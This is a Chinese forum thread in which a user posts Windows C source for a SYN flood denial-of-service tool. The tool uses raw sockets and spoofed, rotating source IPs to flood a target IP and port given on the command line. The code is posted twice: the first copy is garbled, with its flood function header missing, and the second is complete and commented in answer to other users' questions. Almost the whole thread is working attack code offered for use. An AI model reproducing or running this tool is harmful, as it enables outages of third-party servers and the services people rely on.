中文XML论坛 - 专业的XML技术讨论区--显示贴子

以文本方式查看主题

-  中文XML论坛 - 专业的XML技术讨论区  (http://bbs.xml.org.cn/index.asp)
--  『安全理论』  (http://bbs.xml.org.cn/list.asp?boardid=65)
----  syn拒绝服务攻击代码  (http://bbs.xml.org.cn/dispbbs.asp?boardid=65&rootid=&id=54463)

--  作者：huqige
--  发布时间：10/26/2007 9:11:00 PM

--  syn拒绝服务攻击代码
#include <winsock2.h>
#include <Ws2tcpip.h>
#include <windows.h>
#include <stdio.h>

#pragma comment(lib,"ws2_32")
#pragma comment(lib,"wsock32")
#define FAKE_IP "201.79.131.18"
#define SEQ 0x28376839
#define right "===============Coder Paris-ye====================\n"
USHORT checksum(USHORT *buffer, int size);
int flood();

typedef struct tcphdr
{
USHORT th_sport;
USHORT th_dport;
unsigned int th_seq;
unsigned int th_ack;
unsigned char th_lenres;
unsigned char th_flag;
USHORT th_win;
USHORT th_sum;
USHORT th_urp;
}TCP_HEADER;

typedef struct iphdr
{
unsigned char h_verlen;
unsigned char tos;
unsigned short total_len;
unsigned short ident;
unsigned short frag_and_flags;
unsigned char ttl;
unsigned char proto;
unsigned short checksum;
unsigned int sourceIP;
unsigned int destIP;
}IP_HEADER;

struct
{
unsigned long saddr;
unsigned long daddr;
char mbz;
char ptcl;
unsigned short tcpl;
}PSD_HEADER;

WSADATA wsaData;
SOCKET  sockMain = (SOCKET) NULL;
int ErrorCode=0,flag=true,TimeOut=2000,FakeIpNet,FakeIpHost,dataSize=0,SendSEQ=0;
unsigned short activPort=40000;
struct sockaddr_in sockAddr;
TCP_HEADER  tcpheader;
IP_HEADER   ipheader;
char        sendBuf[128];

USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size >1) {
cksum+=*buffer++;
size-=sizeof(USHORT);
}
if(size) cksum+=*(UCHAR*)buffer;
cksum=(cksum >> 16)+(cksum&0xffff);
cksum+=(cksum >>16);
return (USHORT)(~cksum);
}

int main(int argc,char* argv[])
{
int    portNum=0;
DWORD  dw;
HANDLE hThread=NULL;
char   putInfo;

if(argc!=3)
{
  printf("%s\n",right);
  printf("Invalid command,Pls use:\n%s  <IP> <port>\nExample:%s 192.168.100.244 80",argv[0],argv[0]);
  return 1;
}
if((ErrorCode=WSAStartup(MAKEWORD(2,1),&wsaData))!=0){
         printf("WSAStartup failed: %d\n",ErrorCode);
         return 2;
}
sockMain=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED);
if(sockMain==INVALID_SOCKET)
{
  printf("Socket failed: %d\n",WSAGetLastError());
return 3;
}
ErrorCode=setsockopt(sockMain,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(int));
if(ErrorCode==SOCKET_ERROR)
{
         printf("Set sockopt failed: %d\n",WSAGetLastError());
  return 4;
}
ErrorCode=setsockopt(sockMain,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut,sizeof(TimeOut));
if(ErrorCode==SOCKET_ERROR)
{
         printf("Set sockopt time out failed: %d\n",WSAGetLastError());
return 5;
}
portNum=atoi(argv[2]);

memset(&sockAddr,0,sizeof(sockAddr));
sockAddr.sin_family=AF_INET;
sockAddr.sin_addr.s_addr =inet_addr(argv[1]);
FakeIpNet=inet_addr(FAKE_IP);
FakeIpHost=ntohl(FakeIpNet);

ipheader.h_verlen=(4<<4 | sizeof(IP_HEADER)/sizeof(unsigned long));
ipheader.total_len = htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER));
ipheader.ident = 1;
ipheader.frag_and_flags = 0;
ipheader.ttl = 128;
ipheader.proto = IPPROTO_TCP;
ipheader.checksum =0;
ipheader.sourceIP = htonl(FakeIpHost+SendSEQ);
ipheader.destIP = inet_addr(argv[1]);

tcpheader.th_dport=htons(portNum);
tcpheader.th_sport = htons(portNum);
tcpheader.th_seq = htonl(SEQ+SendSEQ);
tcpheader.th_ack = 0;
tcpheader.th_lenres =(sizeof(TCP_HEADER)/4<<4|0);
tcpheader.th_flag = 2;
tcpheader.th_win = htons(16384);
tcpheader.th_urp = 0;
tcpheader.th_sum = 0;

PSD_HEADER.saddr=ipheader.sourceIP;
PSD_HEADER.daddr=ipheader.destIP;
PSD_HEADER.mbz=0;
PSD_HEADER.ptcl=IPPROTO_TCP;
PSD_HEADER.tcpl=htons(sizeof(tcpheader));
printf("%s\n",right);
hThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)flood,0,CREATE_SUSPENDED,&dw);
SetThreadPriority(hThread,THREAD_PRIORITY_HIGHEST);
ResumeThread(hThread);
printf("Warning[start]...........\nPress any key to stop!\n");
putInfo=getchar();
TerminateThread(hThread,0);
WSACleanup();
printf("\nStopd...........\n");

return 0;
}

  memcpy(sendBuf,&ipheader,sizeof(ipheader));
  memcpy(sendBuf+sizeof(ipheader),&tcpheader,sizeof(tcpheader));
  memset(sendBuf+sizeof(ipheader)+sizeof(tcpheader),0,4);
  dataSize=sizeof(ipheader)+sizeof(tcpheader);
  ipheader.checksum=checksum((USHORT *)sendBuf,dataSize);
  memcpy(sendBuf,&ipheader,sizeof(ipheader));
  ErrorCode=sendto(sockMain,sendBuf,dataSize,0,(struct sockaddr*) &sockAddr,sizeof(sockAddr));
  if(ErrorCode==SOCKET_ERROR)
  {
   printf("\nCan't connect this IP!Pls check it.\n");
   ExitThread(1);
  }
  // Sleep(1000);
}
return 0;
}

--  作者：changeone
--  发布时间：11/8/2007 5:58:00 PM

--
能把这段代码的原理解释一下吗？看不太懂

--  作者：huyin
--  发布时间：3/10/2008 9:13:00 PM

--
里面的那个IP是指什么？？

--  作者：秋十三
--  发布时间：1/4/2009 6:32:00 PM

--
好很棒啊

--  作者：huqige
--  发布时间：1/5/2009 5:11:00 PM

--
#include <winsock2.h>
#include <Ws2tcpip.h>
#include <windows.h>
#include <stdio.h>
//加载头文件就和导入包类一样
#pragma comment(lib,"ws2_32")
#pragma comment(lib,"wsock32")
#define FAKE_IP "201.79.131.18"
//ip地址随便
#define SEQ 0x28376839
#define right "===============Coder Paris-ye====================\n"
//预定义
USHORT checksum(USHORT *buffer, int size);
int flood();
typedef struct tcphdr
{
USHORT th_sport;
USHORT th_dport;
unsigned int th_seq;
unsigned int th_ack;
unsigned char th_lenres;
unsigned char th_flag;
USHORT th_win;
USHORT th_sum;
USHORT th_urp;
}TCP_HEADER;
//定义结构用于存放tcp头部
typedef struct iphdr
{
unsigned char h_verlen;
unsigned char tos;
unsigned short total_len;
unsigned short ident;
unsigned short frag_and_flags;
unsigned char  ttl;
unsigned char proto;
unsigned short checksum;
unsigned int sourceIP;
unsigned int destIP;
}IP_HEADER;
struct
{
unsigned long saddr;
unsigned long daddr;
char mbz;
char ptcl;
unsigned short tcpl;
}PSD_HEADER;
WSADATA wsaData;
SOCKET  sockMain = (SOCKET) NULL;
int ErrorCode=0,flag=true,TimeOut=2000,FakeIpNet,FakeIpHost,dataSize=0,SendSEQ=0;
unsigned short activPort=40000;
struct sockaddr_in sockAddr;
TCP_HEADER  tcpheader;
IP_HEADER   ipheader; //和mew类一样
char        sendBuf[128];
USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size >1) {
  cksum+=*buffer++;
  size-=sizeof(USHORT);
} //校验
if(size) cksum+=*(UCHAR*)buffer;
cksum=(cksum >> 16)+(cksum&0xffff);
cksum+=(cksum >>16);
return (USHORT)(~cksum);
}

int main(int argc,char* argv[])
{
int    portNum=0;
DWORD  dw;
HANDLE hThread=NULL;
char   putInfo;
if(argc!=3)
{
  printf("%s\n",right);
  printf("Invalid command,Pls use:\n%s  <IP> <port>\nExample:%s 192.168.100.244 80",argv[0],argv[0]);
  return 1;
}
if((ErrorCode=WSAStartup(MAKEWORD(2,1),&wsaData))!=0){
         printf("WSAStartup failed: %d\n",ErrorCode);
         return 2;
}
sockMain=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED);
//建立raw  socket连接
if(sockMain==INVALID_SOCKET)
{
  printf("Socket failed: %d\n",WSAGetLastError());
return 3;
}
ErrorCode=setsockopt(sockMain,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(int));
if(ErrorCode==SOCKET_ERROR)
{
         printf("Set sockopt failed: %d\n",WSAGetLastError());
  return 4;
}
ErrorCode=setsockopt(sockMain,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut,sizeof(TimeOut));
if(ErrorCode==SOCKET_ERROR)
{
         printf("Set sockopt time out failed: %d\n",WSAGetLastError());
return 5;
}
portNum=atoi(argv[2]);
memset(&sockAddr,0,sizeof(sockAddr));
sockAddr.sin_family=AF_INET; //协议簇  windows专用的AF_INET
sockAddr.sin_addr.s_addr =inet_addr(argv[1]);
FakeIpNet=inet_addr(FAKE_IP);
FakeIpHost=ntohl(FakeIpNet);
ipheader.h_verlen=(4<<4 | sizeof(IP_HEADER)/sizeof(unsigned long));
ipheader.total_len = htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER));
ipheader.ident = 1;
ipheader.frag_and_flags = 0; //标志位
ipheader.ttl = 128; //存活时间
ipheader.proto = IPPROTO_TCP; //tcp
ipheader.checksum =0;
ipheader.sourceIP = htonl(FakeIpHost+SendSEQ); //源地址
ipheader.destIP = inet_addr(argv[1]);
tcpheader.th_dport=htons(portNum);
tcpheader.th_sport = htons(portNum);
tcpheader.th_seq = htonl(SEQ+SendSEQ);
tcpheader.th_ack = 0; //ack位  tcp3次握手
tcpheader.th_lenres =(sizeof(TCP_HEADER)/4<<4|0);
tcpheader.th_flag = 2;
tcpheader.th_win = htons(16384);
tcpheader.th_urp = 0;
tcpheader.th_sum = 0;
PSD_HEADER.saddr=ipheader.sourceIP;
PSD_HEADER.daddr=ipheader.destIP;
PSD_HEADER.mbz=0;
PSD_HEADER.ptcl=IPPROTO_TCP;
PSD_HEADER.tcpl=htons(sizeof(tcpheader));
printf("%s\n",right);
hThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)flood,0,CREATE_SUSPENDED,&dw);
SetThreadPriority(hThread,THREAD_PRIORITY_HIGHEST);
ResumeThread(hThread);
printf("Warning[start]...........\nPress any key to stop!\n");
putInfo=getchar();
TerminateThread(hThread,0);
WSACleanup();
printf("\nStopd...........\n");
return 0;
}

int flood()
{
while(1)
{
  if(SendSEQ++==65536) SendSEQ=1;
  if(activPort++==40010) activPort=1000;
  ipheader.checksum =0;
  ipheader.sourceIP = htonl(FakeIpHost+SendSEQ);
  tcpheader.th_seq = htonl(SEQ+SendSEQ);
  tcpheader.th_sport = htons(activPort);
  tcpheader.th_sum = 0;
  PSD_HEADER.saddr=ipheader.sourceIP;
  memcpy(sendBuf,&PSD_HEADER,sizeof(PSD_HEADER));
  memcpy(sendBuf+sizeof(PSD_HEADER),&tcpheader,sizeof(tcpheader));
  tcpheader.th_sum=checksum((USHORT *)sendBuf,sizeof(PSD_HEADER)+sizeof(tcpheader));
  memcpy(sendBuf,&ipheader,sizeof(ipheader));
  memcpy(sendBuf+sizeof(ipheader),&tcpheader,sizeof(tcpheader));
  memset(sendBuf+sizeof(ipheader)+sizeof(tcpheader),0,4);
  dataSize=sizeof(ipheader)+sizeof(tcpheader);
  ipheader.checksum=checksum((USHORT *)sendBuf,dataSize);
  memcpy(sendBuf,&ipheader,sizeof(ipheader));
  ErrorCode=sendto(sockMain,sendBuf,dataSize,0,(struct sockaddr*) &sockAddr,sizeof(sockAddr));
  if(ErrorCode==SOCKET_ERROR)
  {
   printf("无法连接次地址。请检查并更正\n");
   ExitThread(1);
  }

}
return 0;
}
加了点注释，还有什么不清楚的就说

W 3 C h i n a ( since 2003 ) 旗下站点
苏ICP备05006046号《全国人大常委会关于维护互联网安全的决定》《计算机信息网络国际联网安全保护管理办法》

781.250ms